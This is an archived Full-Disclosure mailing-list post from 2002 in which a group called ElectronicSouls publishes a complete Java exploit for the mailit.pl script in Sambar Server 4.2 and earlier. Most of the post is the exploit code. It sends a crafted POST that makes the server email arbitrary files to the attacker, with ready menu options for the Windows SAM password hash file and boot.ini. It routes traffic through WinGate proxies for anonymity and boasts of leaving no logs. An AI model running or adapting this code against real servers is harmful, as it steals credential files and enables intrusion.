| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Sambar Exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is an exploit for Sambar Server's mailit.pl, written in JAVA. we
were taught JAVA by KF[0dd], the internet's premier exploit writing
genius, and technical support to most ADM/0dd exploits.
# cat SambarMailit.java
/*---Written by Craig[TM]--- Electronicsouls-2001
* This little java Exploit will use Sambar Servers' mailit.pl
* to send any file to your eMail address.
*
* To use this, you need a...
*
* - mail relay
* - secure eMail address (http://www.hushmail.com)
* - java compiler and a Sambar Server<=4.2 with mailit.pl of course
*
* When using WinGates, separate them with "," like this:
* Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1
*
* This exploit should leave NO logfiles - well, at least on my own server it did not!
*
*
* BTW:I dunno if I may call this '0day' - somewhere on
* a blackhead website i found a hint that there was an issue with
* mailit.pl, so I figured it out...
*
*
* [Craig]
*
* He...don't use this to deface...this is proof-of-concept code only!
*
* Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN!
*
*/
import java.io.*;
import java.net.*;
import java.util.*;
public class SambarMailit
{
//line from server that is read in
static String line="";
//arrays for wingates
static String Wingates[]=new String[100];
//vars for the user input from console
static String SMTPServer;
static String Server;
static String File;
static String eMail;
//the shit for the socket ;)
static DataInputStream in = new DataInputStream (System.in);
static DataInputStream sin;
static PrintStream sout;
static Socket s=null;
//some "switches" int the program
static boolean useWingates=false;
static int Mode;
//the user menu
void HoleModus()
{
try
{
System.out.println("What do you want?");
System.out.println("(1) send me C:\\winnt\\repair\\sam._");
System.out.println("(2) send me C:\\boot.ini");
System.out.println("(3) send me a file I want");
System.out.println("(4) quit");
System.out.print(">");
DataInputStream in = new DataInputStream (System.in);
String raw=in.readLine();
Mode=Integer.valueOf(raw).intValue();
if (Mode<1 || Mode>4 || Mode%1!=0)
{System.out.println("invalid option! quitting...");System.exit(0);}
if (Mode==4)System.exit(0);
System.out.print("\n");
}//try
catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
}//get()
//ask user for server
void HoleServer()
{
try
{
System.out.print("Enter Server>");
DataInputStream in = new DataInputStream (System.in);
Server=in.readLine();
}//try
catch (IOException e) {System.out.println("Error reading input from Console:"+e);}
}//get()
//ask user for wingates - i would strongly suggest to use this!
void HoleWingates()
{
try
{
System.out.print("Enter Wingate/s>");
DataInputStream in = new DataInputStream (System.in);
String WingatesRaw=in.readLine();
StringTokenizer token = new StringTokenizer(WingatesRaw, ",");
int num_tokens = token.countTokens();
for (int i = 0;i< num_tokens;i++)
{
Wingates[i]=token.nextToken();
Wingates[i]=Wingates[i].trim();
}
if (Wingates[0]!=null && Wingates[0]!="")useWingates=true;
//for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]);
}//try
catch (IOException e) {System.out.println("Error with your Wingates:"+e);}
}//HoleWingates
//ask user where to download and so on...
void HoleOptions()
{
try
{
System.out.print("Mail relay>");
in = new DataInputStream (System.in);
SMTPServer=in.readLine();
System.out.print("My eMail>");
in = new DataInputStream (System.in);
eMail=in.readLine();
if (Mode==3)
{
System.out.print("File to send>");
DataInputStream in = new DataInputStream (System.in);
File=in.readLine();
}
}
catch (IOException e){System.out.println("Error reading input from Console:"+e);}
}//
//connect to the server with or without WinGates
void Verbinde()
{
try
{
if (useWingates==true)
{
s = new Socket(Wingates[0], 23);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
for (int i=1;Wingates[i]!=null;i++)
{
System.out.println("Trying to connect to "+Wingates[i]+"...");
sout.println(Wingates[i]+" 23");
line=sin.readLine();
System.out.println(line);
}
System.out.println("Now trying to connect to "+Server+":80...");
sout.println(Server+" 80");
System.out.println((line=sin.readLine()));
}
else
{
s = new Socket(Server, 80);
sin = new DataInputStream (s.getInputStream());
sout = new PrintStream (s.getOutputStream());
}
}//try
catch (IOException e){System.out.println("Error Connecting:"+e);}
}//verbinde()
//main program
public static void main(String[] args)
{
System.out.println("\nCraig's Sambar<=4.2 (0day?) mailit.pl Exploit");
SambarMailit Sam=new SambarMailit();
Sam.HoleModus();
Sam.HoleServer();
Sam.HoleWingates();
Sam.HoleOptions();
try
{
if (Mode==1)File="C:\\winnt\\repair\\sam._";
if (Mode==2)File="C:\\boot.ini";
Sam.Verbinde();
sout.println("POST /cgi-bin/mailit.pl HTTP/1.1");
sout.println("Content-Type: application/x-www-form-urlencoded");
sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)");
sout.println("Host: "+Server);
//for the POST command, we need to know the exact length of data to send
int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length();
sout.println("Content-Length: "+l);
sout.println("Connection: Keep-Alive\n");
sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai
r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File");
System.out.println();
while (true)
{
line=sin.readLine();
if (line==null)break;
System.out.println(line);
if (line.indexOf("MailIt Failed")>-1)
{System.out.println("ERROR!\n\n");break;}
if (line.indexOf("MailIt Succeeded.")>-1)
{System.out.println("SUCCESS!\n\n");break;}
}
s.close();
}//try
catch (IOException e){System.out.println("Error!:"+e);}
}//public
}//class
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Short Music For Short People."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN
jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA==
=8b73
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists